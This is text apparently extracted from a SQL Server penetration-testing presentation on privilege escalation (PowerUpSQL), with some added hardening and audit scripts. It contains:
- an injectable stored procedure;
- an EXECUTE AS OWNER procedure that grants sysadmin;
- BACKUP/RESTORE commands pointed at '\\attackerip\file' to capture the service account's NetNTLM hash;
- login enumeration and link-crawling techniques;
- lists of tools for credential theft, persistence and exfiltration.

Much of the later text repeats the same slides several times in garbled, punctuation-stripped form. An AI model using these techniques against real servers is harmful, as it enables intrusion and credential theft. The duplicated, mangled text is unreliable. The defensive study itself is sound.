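    ENCRYPTION BY PASSWORD = '<cert password placeholder>'
    WITH SUBJECT = 'Signs MyAppDb.dbo.sp_list_databases';
GO
CREATE LOGIN MyAppSigningLogin FROM CERTIFICATE MyAppSigningCert;
GO

-- Step 5: exactly the server-level right the procedure needs, nothing more.
GRANT VIEW ANY DATABASE TO MyAppSigningLogin;
GO

-- Copy the certificate (with its private key) into the application database
-- so the procedure can be signed there.
BACKUP CERTIFICATE MyAppSigningCert
    TO FILE = 'C:\placeholder\MyAppSigningCert.cer'
    WITH PRIVATE KEY (FILE = 'C:\placeholder\MyAppSigningCert.pvk',
                      ENCRYPTION BY PASSWORD = '<pvk password placeholder>',
                      DECRYPTION BY PASSWORD = '<cert password placeholder>');
GO
USE MyAppDb;
GO
-- Step 2: the database master key protects the imported private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<dmk password placeholder>';
GO
CREATE CERTIFICATE MyAppSigningCert
    FROM FILE = 'C:\placeholder\MyAppSigningCert.cer'
    WITH PRIVATE KEY (FILE = 'C:\placeholder\MyAppSigningCert.pvk',
                      DECRYPTION BY PASSWORD = '<pvk password placeholder>');
GO

-- Step 6: sign the module. Any later ALTER of the procedure drops the
-- signature, so a tampered procedure silently loses the extra rights.
ADD SIGNATURE TO dbo.sp_list_databases BY CERTIFICATE MyAppSigningCert;
GO

-- Step 7: let the application user call it (and nothing else).
GRANT EXECUTE ON dbo.sp_list_databases TO MyAppUser;
GO

-- Check: which modules in this database carry which certificate signatures.
SELECT OBJECT_NAME(cp.major_id) AS signed_module, c.name AS certificate_name
FROM sys.crypt_properties AS cp
JOIN sys.certificates AS c ON c.thumbprint = cp.thumbprint;
GO
```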
Escalating Privileges: Impersonation / SQL Injection Example
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO
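The same procedure with the user value bound as a parameter instead of concatenated into the statement text, as an added example that is not from the PowerUpSQL deck. dbo.sp_sqli2_fixed is a placeholder name, and the check at the end assumes the caller may read sys.databases.

```sql
-- Added hardened counterpart to sp_sqli2 (not from the PowerUpSQL deck).
-- sp_sqli2 concatenates @DbName into the statement, so a quote in the input
-- changes the query; under an EXECUTE AS OWNER or signed procedure that changed
-- query also runs in the elevated context (the "impersonation via SQL
-- injection" con above).
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;

    -- The statement text is fixed; the user value is only ever a parameter.
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases
          WHERE name LIKE @pattern ESCAPE ''\'' OR name = N''tempdb''';

    -- Escape LIKE wildcards so "%" or "_" in the input matches literally.
    DECLARE @pattern nvarchar(400) =
        N'%' + REPLACE(REPLACE(REPLACE(@DbName, N'\', N'\\'),
                               N'%', N'\%'),
                       N'_', N'\_') + N'%';

    EXEC sys.sp_executesql
        @query,
        N'@pattern nvarchar(400)',
        @pattern = @pattern;
END;
GO

-- Check: an input containing a quote. sp_sqli2 builds a broken or altered
-- statement from it; the fixed version looks for a database literally named
-- with that text and returns only tempdb.
EXEC dbo.sp_sqli2_fixed @DbName = N'O''Brien';
GO
```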
Escalating Privileges: Shared Service Accounts / Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ, Intranet (with ADS). Ports 80 and 443 reach the DMZ applications; ports 1433 and 1434 reach the database servers. Path shown: 1 SQL Injection against an LVA; 2 Execute local command via xp_cmdshell; 3 Access to HVA with shared domain service account, then execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling SQL Server Links
Escalating Privileges: Crawling SQL Server Links / What's a SQL Server link?
SQL Server links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database links. Same Internet / DMZ / Intranet (ADS) layout with ports 80 and 443 to the DMZ applications and ports 1433 and 1434 to the database servers. DB1 (LVA) holds a DB link with least privileges to one server and a DB link with the SA account to another. Path shown: 1 SQL Injection; 2 Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql
Escalating Privileges: Crawling Server Links
Function | Description
Get-SQLServerLink | Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl | Crawls linked servers and supports SQL query and OS command execution
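Before a crawl tool finds it, the "DB link with SA account" case in the diagram above shows up in the catalog views as a link whose default mapping hands every local login a fixed, privileged remote login. The following T-SQL is an added defender-side audit, not code from the PowerUpSQL deck; the remediation lines use placeholder names.

```sql
-- Added audit example (not from the PowerUpSQL deck): every linked server with
-- the remote credential each local principal receives. local_principal_id = 0
-- is the documented catch-all mapping that applies to all local logins, which
-- includes anyone in public.
SELECT s.name AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,        -- required for EXEC ... AT (remote procedures)
       s.is_data_access_enabled,    -- required for OPENQUERY
       CASE WHEN ll.local_principal_id = 0 THEN '<all local logins>'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       CASE WHEN ll.uses_self_credential = 1 THEN '<caller''s own credentials>'
            ELSE ll.remote_name END AS remote_login,
       CASE WHEN ll.local_principal_id = 0
             AND ll.uses_self_credential = 0
             AND ll.remote_name IS NOT NULL
                 THEN 'REVIEW: one fixed remote login for every caller'
            WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 1
                 THEN 'ok: credentials are passed through'
            ELSE 'ok: explicit per-login mapping'
       END AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation pattern for a REVIEW row (placeholder names, run as sysadmin):
-- drop the catch-all mapping, map only the logins that need the link to a
-- low-privileged remote login, and turn off RPC out unless remote procedure
-- calls are actually required.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = 'LinkName', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin @rmtsrvname = 'LinkName', @useself = 'false',
--      @locallogin = 'AppLogin', @rmtuser = 'LinkReader', @rmtpassword = '<placeholder>';
-- EXEC sp_serveroption @server = 'LinkName', @optname = 'rpc out', @optvalue = 'false';
```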
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016
https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges
OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin / Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin / Here are some tool options
Approach | Common Tools
Access as Local Administrator | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem | Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode | DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Hosts: an LRA and an HVA, several LVAs, ADS. Ports 80 and 443 between the Internet and the DMZ; ports 1433 and 1434 between the DMZ and the Intranet. Steps shown for the attacker ("Captain Evil", labelled PURE EVIL): (1) SQL injection against an LVA; (2) execute a local command via xp_cmdshell; (3) execute commands and gather data from other database servers via osql, giving access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.]
